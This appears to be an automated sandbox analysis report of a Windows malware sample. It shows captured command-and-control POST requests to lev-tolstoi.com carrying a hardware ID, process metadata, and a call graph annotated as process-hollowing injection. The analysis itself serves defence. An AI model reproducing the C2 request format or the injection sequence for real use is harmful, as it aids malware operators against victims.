                                                                                                                                                                                                                                                                2024-12-20 06:04:29 UTC15331OUTData Raw: ad 26 81 a6 c5 9b 62 03 ed 2f 61 23 a0 8d 40 0c cb e0 28 fa f6 77 54 3a 6f 2c ec 57 53 7a a2 90 0f cc e0 a0 32 aa 1d c5 7e 9c 8d f7 bb 66 5e 7f 71 db ff e4 85 e0 f3 57 da ec d5 b4 16 df 57 cd 42 97 ec ce 62 8d d2 0d 0a cf 95 0a 3f 98 2a 5b 35 78 ab 69 6b 2b ce 92 d5 dc c7 54 4a 77 bd 76 4a bb 4d ca e1 bc 14 9f 29 29 30 68 b9 2d 31 c6 e1 c3 9e 68 ba cf f2 ae f0 a0 77 0b 5b 10 f6 2a 3b 46 8b 66 2c 7a bf b6 68 e9 55 ba f9 b1 a1 41 74 eb b4 1c e2 5c 24 75 95 77 60 45 8a 32 8e a3 a5 1a 17 6d 16 e7 6e 14 7c 0b 48 a1 e8 73 ee bf 68 f6 c8 97 7b fe 3e 65 eb 36 3b 67 f4 43 b9 28 d7 eb 76 b9 4d 9d b4 f5 59 1b b3 f7 f4 9b a5 f3 b7 9b df bd 7a 1b 3a fd 28 a7 7d 25 44 70 91 d9 96 b5 df 32 57 4a a1 e2 8a 10 b9 dc 46 9c fb 06 71 64 fe d5 cb 29 b7 4f d6 b3 2b 12 e5 2b c9
                                                                                                                                                                                                                                                                Data Ascii: &b/a#@(wT:o,WSz2~f^qWWBb?*[5xik+TJwvJM))0h-1hw[*;Ff,zhUAt\$uw`E2mn|Hsh{>e6;gC(vMYz:(}%Dp2WJFqd)O++
                                                                                                                                                                                                                                                                2024-12-20 06:04:31 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:31 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=tpqia02tbr59fub1pk8se6ieij; expires=Mon, 14 Apr 2025 23:51:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GE8XO2lSe8DEEgO2HUZvyZY67QjyFvjib7hIPyxegWFDU7HykK9RpUVUgYBGi1GUF6zxN0xNkiNIcd2sSCE9yWRZ2e06h4QV20waP6Z%2BWRuzTJfuTW92uJ5fnSxh3wRKYg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f6e6d967c93-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1814&rtt_var=686&sent=327&recv=609&lost=0&retrans=0&sent_bytes=2835&recv_bytes=590442&delivery_rate=1589548&cwnd=210&unsent_bytes=0&cid=61ed7bf4d9388229&ts=2308&x=0"


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                10192.168.2.649781104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 89
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 26 6a 3d 26 68 77 69 64 3d 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43
                                                                                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--nbgnxdlxdnyo&j=&hwid=DE39FCFBD83CCE4A00D57F9DDD37BE0C
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC1129INHTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 06:04:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=b265fsuggjdiha7mkkqiit2s0e; expires=Mon, 14 Apr 2025 23:51:12 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3Dfl93MSktTJpW%2FJt76%2B0iNWqKSmKlmqvArjB4HAthNjySyj2R2r%2BGT7OX8r7cjo%2FiNjorD21zy3i1Vecx7HepEgxLUsgyPLbtTKDIyE5qH8k7L%2FXlWnuEwr%2BLnp7MTRnc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f4d6f854a3b1a07-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1789&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=988&delivery_rate=1551540&cwnd=245&unsent_bytes=0&cid=24e457c5df2803ba&ts=774&x=0"
2024-12-20 06:04:33 UTC 54 IN Data Raw: 33 30 0d 0a 36 46 56 76 36 64 46 33 6a 79 62 6e 6b 58 32 75 45 44 6f 33 6a 65 69 48 79 4b 64 49 73 39 42 42 6c 4c 35 39 75 35 6c 33 53 57 4f 7a 43 41 3d 3d 0d 0a
Data Ascii: 306FVv6dF3jybnkX2uEDo3jeiHyKdIs9BBlL59u5l3SWOzCA==
2024-12-20 06:04:33 UTC 5 IN Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 01:03:56
Start date: 20/12/2024
Path: C:\Users\user\Desktop\8ZVMneG.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\8ZVMneG.exe"
Imagebase: 0xec0000
File size: 810'496 bytes
MD5 hash: E8AF4D0D0B47AC68D762B7F288AE8E6E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 01:03:56
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 01:04:00
Start date: 20/12/2024
Path: C:\Users\user\Desktop\8ZVMneG.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\8ZVMneG.exe"
Imagebase: 0xec0000
File size: 810'496 bytes
MD5 hash: E8AF4D0D0B47AC68D762B7F288AE8E6E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 6%
Dynamic/Decrypted Code Coverage: 0.7%
Signature Coverage: 2.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 29
                                                                                                                                                                                                                                                                  execution_graph 19422 eca2ea 19423 eca2f6 __EH_prolog3_GS 19422->19423 19425 eca35f 19423->19425 19426 eca346 19423->19426 19430 eca310 19423->19430 19424 ecb98e std::_Throw_Cpp_error 5 API calls 19427 eca437 19424->19427 19441 ed4621 19425->19441 19438 ec9aa0 19426->19438 19430->19424 19431 ec1840 std::_Throw_Cpp_error 29 API calls 19431->19430 19433 eca423 19433->19431 19434 eca37e 19434->19433 19436 ed4621 45 API calls 19434->19436 19437 eca453 19434->19437 19461 ec9949 19434->19461 19436->19434 19437->19433 19465 ed5c77 19437->19465 19439 ed4621 45 API calls 19438->19439 19440 ec9aab 19439->19440 19440->19430 19442 ed462d ___scrt_is_nonwritable_in_current_image 19441->19442 19443 ed464f 19442->19443 19444 ed4637 19442->19444 19478 ecf144 EnterCriticalSection 19443->19478 19446 ed34c5 __strnicoll 14 API calls 19444->19446 19448 ed463c 19446->19448 19447 ed465a 19450 edaab8 __fread_nolock 29 API calls 19447->19450 19458 ed4672 19447->19458 19449 ed3bb0 __strnicoll 29 API calls 19448->19449 19460 ed4647 _Fputc 19449->19460 19450->19458 19451 ed46da 19453 ed34c5 __strnicoll 14 API calls 19451->19453 19452 ed4702 19479 ed473a 19452->19479 19455 ed46df 19453->19455 19457 ed3bb0 __strnicoll 29 API calls 19455->19457 19456 ed4708 19489 ed4732 19456->19489 19457->19460 19458->19451 19458->19452 19460->19434 19462 ec997d 19461->19462 19464 ec9959 19461->19464 19661 ecabc5 19462->19661 19464->19434 19466 ed5c83 ___scrt_is_nonwritable_in_current_image 19465->19466 19467 ed5c9f 19466->19467 19468 ed5c8a 19466->19468 19709 ecf144 EnterCriticalSection 19467->19709 19470 ed34c5 __strnicoll 14 API calls 19468->19470 19472 ed5c8f 19470->19472 19471 ed5ca9 19710 ed5cea 19471->19710 19474 ed3bb0 __strnicoll 29 API calls 
19472->19474 19477 ed5c9a 19474->19477 19477->19437 19478->19447 19480 ed475b 19479->19480 19481 ed4746 19479->19481 19483 ed476a 19480->19483 19492 edfa2e 19480->19492 19482 ed34c5 __strnicoll 14 API calls 19481->19482 19484 ed474b 19482->19484 19483->19456 19486 ed3bb0 __strnicoll 29 API calls 19484->19486 19488 ed4756 19486->19488 19488->19456 19660 ecf158 LeaveCriticalSection 19489->19660 19491 ed4738 19491->19460 19493 edfa39 19492->19493 19494 edfa46 19493->19494 19498 edfa5e 19493->19498 19495 ed34c5 __strnicoll 14 API calls 19494->19495 19496 edfa4b 19495->19496 19497 ed3bb0 __strnicoll 29 API calls 19496->19497 19507 ed4767 19497->19507 19499 edfabd 19498->19499 19498->19507 19513 ee1a1f 19498->19513 19501 edaab8 __fread_nolock 29 API calls 19499->19501 19502 edfad6 19501->19502 19518 edfe20 19502->19518 19505 edaab8 __fread_nolock 29 API calls 19506 edfb0f 19505->19506 19506->19507 19508 edaab8 __fread_nolock 29 API calls 19506->19508 19507->19456 19509 edfb1d 19508->19509 19509->19507 19510 edaab8 __fread_nolock 29 API calls 19509->19510 19511 edfb2b 19510->19511 19512 edaab8 __fread_nolock 29 API calls 19511->19512 19512->19507 19514 ed8700 __Getctype 14 API calls 19513->19514 19515 ee1a3c 19514->19515 19516 ed7347 ___free_lconv_mon 14 API calls 19515->19516 19517 ee1a46 19516->19517 19517->19499 19519 edfe2c ___scrt_is_nonwritable_in_current_image 19518->19519 19520 edfe34 19519->19520 19525 edfe4f 19519->19525 19521 ed34d8 __dosmaperr 14 API calls 19520->19521 19522 edfe39 19521->19522 19523 ed34c5 __strnicoll 14 API calls 19522->19523 19547 edfade 19523->19547 19524 edfe66 19527 ed34d8 __dosmaperr 14 API calls 19524->19527 19525->19524 19526 edfea1 19525->19526 19528 edfebf 19526->19528 19529 edfeaa 19526->19529 19530 edfe6b 19527->19530 19548 edebd5 EnterCriticalSection 19528->19548 19531 ed34d8 __dosmaperr 14 API calls 19529->19531 19533 ed34c5 __strnicoll 14 API calls 19530->19533 19535 edfeaf 19531->19535 19534 edfe73 19533->19534 19540 ed3bb0 
__strnicoll 29 API calls 19534->19540 19537 ed34c5 __strnicoll 14 API calls 19535->19537 19536 edfec5 19538 edfef9 19536->19538 19539 edfee4 19536->19539 19537->19534 19549 edff39 19538->19549 19542 ed34c5 __strnicoll 14 API calls 19539->19542 19540->19547 19543 edfee9 19542->19543 19545 ed34d8 __dosmaperr 14 API calls 19543->19545 19544 edfef4 19612 edff31 19544->19612 19545->19544 19547->19505 19547->19507 19548->19536 19550 edff4b 19549->19550 19551 edff63 19549->19551 19552 ed34d8 __dosmaperr 14 API calls 19550->19552 19553 ee02a5 19551->19553 19556 edffa6 19551->19556 19554 edff50 19552->19554 19555 ed34d8 __dosmaperr 14 API calls 19553->19555 19557 ed34c5 __strnicoll 14 API calls 19554->19557 19558 ee02aa 19555->19558 19559 edffb1 19556->19559 19562 edff58 19556->19562 19567 edffe1 19556->19567 19557->19562 19560 ed34c5 __strnicoll 14 API calls 19558->19560 19561 ed34d8 __dosmaperr 14 API calls 19559->19561 19563 edffbe 19560->19563 19564 edffb6 19561->19564 19562->19544 19565 ed3bb0 __strnicoll 29 API calls 19563->19565 19566 ed34c5 __strnicoll 14 API calls 19564->19566 19565->19562 19566->19563 19568 edfffa 19567->19568 19569 ee0007 19567->19569 19570 ee0035 19567->19570 19568->19569 19575 ee0023 19568->19575 19571 ed34d8 __dosmaperr 14 API calls 19569->19571 19572 ed7381 __fread_nolock 15 API calls 19570->19572 19573 ee000c 19571->19573 19576 ee0046 19572->19576 19577 ed34c5 __strnicoll 14 API calls 19573->19577 19619 ee26b4 19575->19619 19580 ed7347 ___free_lconv_mon 14 API calls 19576->19580 19578 ee0013 19577->19578 19581 ed3bb0 __strnicoll 29 API calls 19578->19581 19579 ee0181 19582 ee01f5 19579->19582 19586 ee019a GetConsoleMode 19579->19586 19583 ee004f 19580->19583 19585 ee001e __fread_nolock 19581->19585 19584 ee01f9 ReadFile 19582->19584 19587 ed7347 ___free_lconv_mon 14 API calls 19583->19587 19588 ee026d GetLastError 19584->19588 19589 ee0211 19584->19589 19601 ed7347 ___free_lconv_mon 14 API calls 19585->19601 19586->19582 19590 ee01ab 
19586->19590 19591 ee0056 19587->19591 19592 ee027a 19588->19592 19593 ee01d1 19588->19593 19589->19588 19594 ee01ea 19589->19594 19590->19584 19595 ee01b1 ReadConsoleW 19590->19595 19596 ee007b 19591->19596 19597 ee0060 19591->19597 19598 ed34c5 __strnicoll 14 API calls 19592->19598 19593->19585 19605 ed34eb __dosmaperr 14 API calls 19593->19605 19594->19585 19608 ee0236 19594->19608 19610 ee024d 19594->19610 19595->19594 19600 ee01cb GetLastError 19595->19600 19615 eddccf 19596->19615 19602 ed34c5 __strnicoll 14 API calls 19597->19602 19604 ee027f 19598->19604 19600->19593 19601->19562 19603 ee0065 19602->19603 19606 ed34d8 __dosmaperr 14 API calls 19603->19606 19607 ed34d8 __dosmaperr 14 API calls 19604->19607 19605->19585 19606->19585 19607->19585 19628 ee0342 19608->19628 19610->19585 19641 ee05e6 19610->19641 19659 edebf8 LeaveCriticalSection 19612->19659 19614 edff37 19614->19547 19616 eddce3 _Fputc 19615->19616 19647 edde70 19616->19647 19618 eddcf8 _Fputc 19618->19575 19620 ee26ce 19619->19620 19621 ee26c1 19619->19621 19623 ed34c5 __strnicoll 14 API calls 19620->19623 19625 ee26da 19620->19625 19622 ed34c5 __strnicoll 14 API calls 19621->19622 19624 ee26c6 19622->19624 19626 ee26fb 19623->19626 19624->19579 19625->19579 19627 ed3bb0 __strnicoll 29 API calls 19626->19627 19627->19624 19653 ee0499 19628->19653 19630 ed73cf __strnicoll MultiByteToWideChar 19631 ee0456 19630->19631 19635 ee045f GetLastError 19631->19635 19638 ee038a 19631->19638 19632 ee03e4 19639 ee039e 19632->19639 19640 eddccf __fread_nolock 31 API calls 19632->19640 19633 ee03d4 19636 ed34c5 __strnicoll 14 API calls 19633->19636 19637 ed34eb __dosmaperr 14 API calls 19635->19637 19636->19638 19637->19638 19638->19585 19639->19630 19640->19639 19642 ee0620 19641->19642 19643 ee06b6 ReadFile 19642->19643 19644 ee06b1 19642->19644 19643->19644 19645 ee06d3 19643->19645 19644->19585 19645->19644 19646 eddccf __fread_nolock 31 API calls 19645->19646 19646->19644 19648 ede98c __fread_nolock 29 
Execution graph (flattened call-graph export: node id, code address, API/symbol labels and src->dst edges; the rendered graph itself is not recoverable from this text)

Nearly all of the dumped nodes in this part of the graph are MSVC CRT and STL runtime rather than sample logic: locale and code-page setup (GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW), heap management (RtlAllocateHeap, HeapFree, HeapReAlloc, HeapSize), TLS and locking (TlsAlloc, TlsSetValue, TlsFree, TlsGetValue, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, SleepConditionVariableSRW, WakeAllConditionVariable), environment handling (GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW), file I/O (GetStdHandle, GetFileType, ReadFile, SetFilePointerEx, GetLastError, SetLastError), delay-loaded imports (LoadLibraryExW, GetProcAddress, FreeLibrary, EncodePointer) and exception dispatch (RaiseException, IsProcessorFeaturePresent). The IsDebuggerPresent -> SetUnhandledExceptionFilter -> UnhandledExceptionFilter sequence at ecb70d and ed3c59, followed by GetCurrentProcess/TerminateProcess at ecb290 and ed3bfe, matches the CRT's fast-fail/security-failure handler, so by itself it is not evidence of a deliberate anti-debugging check; the "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature fires on most MSVC-built binaries for this reason.

The one sample-specific chain in this part of the graph is the remote-process injection sequence at ef21a9-ef246c, which is what the "Injects a PE file into a foreign processes", "Creates a process in suspended mode (likely to inject code)" and "Contains functionality to read the PEB" signatures are derived from. The nodes and edges as exported:

17517 ef21a9 17521 ef21df 17517->17521 17518 ef232c GetPEB 17519 ef233e CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 17518->17519 17520 ef23e5 WriteProcessMemory 17519->17520 17519->17521 17522 ef242a 17520->17522 17521->17518 17521->17519 17523 ef242f WriteProcessMemory 17522->17523 17524 ef246c WriteProcessMemory Wow64SetThreadContext ResumeThread 17522->17524 17523->17522

Read along the edges, the order is: read the PEB (ef232c), CreateProcessW (the CREATE_SUSPENDED flag is not visible in the graph but is implied by the later ResumeThread), VirtualAlloc for a local buffer, Wow64GetThreadContext on the child's primary thread, ReadProcessMemory (typically used to fetch the child's image base from its PEB), VirtualAllocEx in the child, WriteProcessMemory at ef23e5, a write loop formed by the ef242a<->ef242f cycle (the graph does not show what is written; in PE injection this is usually one call per section), and finally WriteProcessMemory, Wow64SetThreadContext and ResumeThread at ef246c. This is the process hollowing pattern; the Wow64GetThreadContext/Wow64SetThreadContext variants indicate a 32-bit (WOW64) sample manipulating a 32-bit child. Nodes 17517 and 17521 (ef21a9, ef21df) carry no API labels and loop back into 17518/17519, so the graph shows the injection being reached from a dispatcher rather than from the CRT entry path.
18541->18545 18542 ee1286 18544 ed34c5 __strnicoll 14 API calls 18542->18544 18543->18397 18544->18543 18545->18541 18545->18542 18546 ed1650 std::ios_base::_Init 2 API calls 18545->18546 18546->18545 18548 ece7da __strnicoll 39 API calls 18547->18548 18549 ed86d3 18548->18549 18550 ed86e5 18549->18550 18555 ed7e9d 18549->18555 18552 ece8d4 18550->18552 18561 ece92c 18552->18561 18558 ed84b2 18555->18558 18559 ed842d std::_Lockit::_Lockit 5 API calls 18558->18559 18560 ed7ea5 18559->18560 18560->18550 18562 ece93a 18561->18562 18563 ece954 18561->18563 18579 ece8ba 18562->18579 18565 ece97a 18563->18565 18566 ece95b 18563->18566 18567 ed73cf __strnicoll MultiByteToWideChar 18565->18567 18578 ece8ec 18566->18578 18583 ece87b 18566->18583 18569 ece989 18567->18569 18570 ece990 GetLastError 18569->18570 18572 ece9b6 18569->18572 18574 ece87b 15 API calls 18569->18574 18588 ed34eb 18570->18588 18575 ed73cf __strnicoll MultiByteToWideChar 18572->18575 18572->18578 18574->18572 18577 ece9cd 18575->18577 18577->18570 18577->18578 18578->18403 18578->18404 18580 ece8c5 18579->18580 18581 ece8cd 18579->18581 18582 ed7347 ___free_lconv_mon 14 API calls 18580->18582 18581->18578 18582->18581 18584 ece8ba 14 API calls 18583->18584 18585 ece889 18584->18585 18593 ece85c 18585->18593 18596 ed34d8 18588->18596 18590 ed34f6 __dosmaperr 18594 ed7381 __fread_nolock 15 API calls 18593->18594 18595 ece869 18594->18595 18595->18578 18597 ed7724 __dosmaperr 14 API calls 18596->18597 18598 ed34dd 18597->18598 18598->18590 18619 ec8b60 18599->18619 18603 ec16ae 18602->18603 18604 ec16c2 GetCurrentThreadId 18603->18604 18605 ec96a8 std::_Throw_Cpp_error 30 API calls 18603->18605 18606 ec16dd 18604->18606 18607 ec16e9 18604->18607 18605->18604 18631 ec8c30 18619->18631 18621 ec8b8e std::_Throw_Cpp_error 18640 ed1131 18621->18640 18623 ec8bdd 18624 ec8bed 18623->18624 18625 ec8bfa 18623->18625 18655 ec42d0 18624->18655 18659 ec96a8 18625->18659 18628 ec8bf5 18629 ec8eaa 
__ehhandler$___std_fs_change_permissions@12 5 API calls 18628->18629 18630 ec17ad 18629->18630 18630->17569 18665 ec8e36 18631->18665 18638 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18639 ec8c8c 18638->18639 18639->18621 18641 ed113e 18640->18641 18642 ed1152 18640->18642 18644 ed34c5 __strnicoll 14 API calls 18641->18644 18692 ed11c2 18642->18692 18646 ed1143 18644->18646 18648 ed3bb0 __strnicoll 29 API calls 18646->18648 18647 ed1167 CreateThread 18650 ed1186 GetLastError 18647->18650 18653 ed1192 18647->18653 18709 ed1249 18647->18709 18649 ed114e 18648->18649 18649->18623 18651 ed34eb __dosmaperr 14 API calls 18650->18651 18651->18653 18701 ed1212 18653->18701 18656 ec42fc 18655->18656 18657 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18656->18657 18658 ec4309 18657->18658 18658->18628 18660 ec96be std::_Throw_Cpp_error 18659->18660 18930 ec96e3 18660->18930 18666 ec8e3b ___std_exception_copy 18665->18666 18667 ec8c58 18666->18667 18668 ed1650 std::ios_base::_Init 2 API calls 18666->18668 18669 ec8e57 18666->18669 18676 ec8d10 18667->18676 18668->18666 18670 ecb09b std::ios_base::_Init 18669->18670 18671 ec8e61 Concurrency::cancel_current_task 18669->18671 18672 ecc47a CallUnexpected RaiseException 18670->18672 18685 ecc47a 18671->18685 18674 ecb0b7 18672->18674 18675 ec97a4 18688 ec8a50 18676->18688 18679 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18680 ec8c6e 18679->18680 18681 ec4280 18680->18681 18682 ec42b0 18681->18682 18683 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18682->18683 18684 ec42bd 18683->18684 18684->18638 18686 ecc494 18685->18686 18687 ecc4c2 RaiseException 18685->18687 18686->18687 18687->18675 18689 ec8a79 18688->18689 18690 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18689->18690 18691 ec8a97 18690->18691 18691->18679 18693 ed8700 __Getctype 14 API calls 18692->18693 18694 ed11d3 18693->18694 18695 ed7347 ___free_lconv_mon 14 API calls 
18694->18695 18696 ed11e0 18695->18696 18697 ed1204 18696->18697 18698 ed11e7 GetModuleHandleExW 18696->18698 18699 ed1212 16 API calls 18697->18699 18698->18697 18700 ed115e 18699->18700 18700->18647 18700->18653 18702 ed121e 18701->18702 18703 ed119d 18701->18703 18704 ed122d 18702->18704 18705 ed1224 CloseHandle 18702->18705 18703->18623 18706 ed123c 18704->18706 18707 ed1233 FreeLibrary 18704->18707 18705->18704 18708 ed7347 ___free_lconv_mon 14 API calls 18706->18708 18707->18706 18708->18703 18710 ed1255 ___scrt_is_nonwritable_in_current_image 18709->18710 18711 ed125c GetLastError ExitThread 18710->18711 18712 ed1269 18710->18712 18713 ed75d3 __Getctype 39 API calls 18712->18713 18714 ed126e 18713->18714 18726 edab1b 18714->18726 18717 ed1285 18730 ec88d0 18717->18730 18739 ec8ca0 18717->18739 18727 ed1279 18726->18727 18728 edab2b CallUnexpected 18726->18728 18727->18717 18748 ed8237 18727->18748 18728->18727 18754 ed82e0 18728->18754 18731 ec4280 5 API calls 18730->18731 18740 ec4280 5 API calls 18739->18740 18749 ed842d std::_Lockit::_Lockit 5 API calls 18748->18749 18755 ed842d std::_Lockit::_Lockit 5 API calls 18754->18755 18756 ed82fc 18755->18756 18756->18727 18931 ec96ef __EH_prolog3_GS 18930->18931 18932 ec1040 std::_Throw_Cpp_error 30 API calls 18931->18932 18933 ec9703 18932->18933 18940 ec32c0 18933->18940 18954 ec3470 18940->18954 18955 ec3494 std::_Throw_Cpp_error 18954->18955 18978 ec3a80 18955->18978 18991 ec1db0 18978->18991 18992 ec1dcb std::_Throw_Cpp_error 18991->18992 18993 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18992->18993 20740 ec5060 20755 ec7620 20740->20755 20742 ec51c6 20764 ec77a0 20742->20764 20743 ec50c1 20743->20742 20761 ec7760 20743->20761 20746 ec5214 20771 ec65f0 20746->20771 20748 ec52ff std::_Throw_Cpp_error 20776 ec79d0 20748->20776 20756 ec7646 std::_Throw_Cpp_error 20755->20756 20810 ec81d0 20756->20810 20759 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20760 ec765b 
20759->20760 20760->20743 20814 ed4c95 20761->20814 20763 ec778e 20763->20742 20765 ec77ba 20764->20765 20766 ec77df 20765->20766 20767 ec77c9 20765->20767 20856 ec8290 20766->20856 20852 ec8240 20767->20852 20770 ec77d7 20770->20746 20895 ec7580 20771->20895 20774 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20775 ec6649 20774->20775 20775->20748 20777 ec7a3b _strcspn 20776->20777 21177 ed51e4 20777->21177 20779 ec7b4a _strcspn 21182 ec3ec0 20779->21182 20781 ec7b85 std::ios_base::_Ios_base_dtor 21201 ec6660 20781->21201 20811 ec81fa std::_Throw_Cpp_error 20810->20811 20812 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20811->20812 20813 ec7651 20812->20813 20813->20759 20815 ed4ca4 20814->20815 20819 ed4cbb __floor_pentium4 20814->20819 20816 ed34c5 __strnicoll 14 API calls 20815->20816 20817 ed4ca9 20816->20817 20818 ed3bb0 __strnicoll 29 API calls 20817->20818 20821 ed4cb4 __startOneArgErrorHandling __floor_pentium4 20818->20821 20819->20821 20822 ee07a0 20819->20822 20821->20763 20823 ee07d9 __startOneArgErrorHandling 20822->20823 20825 ee0800 __startOneArgErrorHandling __floor_pentium4 20823->20825 20833 ee0c16 20823->20833 20826 ee0843 20825->20826 20827 ee081e 20825->20827 20845 ee08a2 20826->20845 20837 ee0b76 20827->20837 20830 ee083e __floor_pentium4 20831 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20830->20831 20832 ee0867 20831->20832 20832->20821 20834 ee0c41 __raise_exc 20833->20834 20835 ee0e3a RaiseException 20834->20835 20836 ee0e52 20835->20836 20836->20825 20838 ee0b83 20837->20838 20839 ee0b92 __floor_pentium4 20838->20839 20841 ee0bc1 __startOneArgErrorHandling __floor_pentium4 20838->20841 20840 ee08a2 __startOneArgErrorHandling 14 API calls 20839->20840 20842 ee0bab 20840->20842 20843 ee0c0f 20841->20843 20844 ee08a2 __startOneArgErrorHandling 14 API calls 20841->20844 20842->20830 20843->20830 20844->20843 20846 ee08af 20845->20846 20847 ee08c6 20845->20847 20849 ee08cb 20846->20849 
20850 ed34c5 __strnicoll 14 API calls 20846->20850 20848 ed34c5 __strnicoll 14 API calls 20847->20848 20848->20849 20849->20830 20851 ee08be 20850->20851 20851->20830 20853 ec8268 std::_Throw_Cpp_error 20852->20853 20854 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20853->20854 20855 ec8286 20854->20855 20855->20770 20857 ec82c8 std::_Throw_Cpp_error 20856->20857 20858 ec8324 20856->20858 20860 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20857->20860 20862 ec8370 20858->20862 20861 ec8362 20860->20861 20861->20770 20863 ec1db0 std::_Throw_Cpp_error 5 API calls 20862->20863 20864 ec83a5 20863->20864 20865 ec83b6 20864->20865 20867 ec1e30 std::_Throw_Cpp_error 30 API calls 20864->20867 20880 ec3950 20865->20880 20867->20865 20868 ec83d6 std::_Throw_Cpp_error 20869 ec1f50 std::_Throw_Cpp_error 30 API calls 20868->20869 20870 ec83f9 std::_Throw_Cpp_error 20869->20870 20871 ec84a2 20870->20871 20873 ec842e std::_Throw_Cpp_error 20870->20873 20872 ef5e70 5 API calls 20871->20872 20878 ec8495 std::_Throw_Cpp_error 20872->20878 20885 ef5e70 20873->20885 20876 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20879 ec84e8 20876->20879 20878->20876 20879->20857 20881 ec1db0 std::_Throw_Cpp_error 5 API calls 20880->20881 20882 ec3967 20881->20882 